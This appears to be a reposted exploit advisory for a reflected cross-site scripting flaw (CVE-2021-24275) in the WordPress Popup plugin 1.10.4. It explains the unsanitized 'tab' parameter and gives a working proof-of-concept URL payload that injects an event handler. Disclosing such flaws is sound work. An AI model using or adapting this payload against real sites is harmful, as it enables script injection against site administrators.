WordPress Popup plugin version 1.10.4 suffers from a cross site scripting vulnerability.
advisories | CVE-2021-24275
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-242751. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Related posts:
NASA Focuses on Cybersecurity of its Mission-Critical Software
LastPass now requires 12-character master passwords for better security
Western Digital app bug gives elevated privileges in Windows, macOS
New APT Group Red Stinger Targets Military and Critical Infrastructure in Eastern Europe
Rethinking Cybersecurity's Structure & the Role of the Modern CISO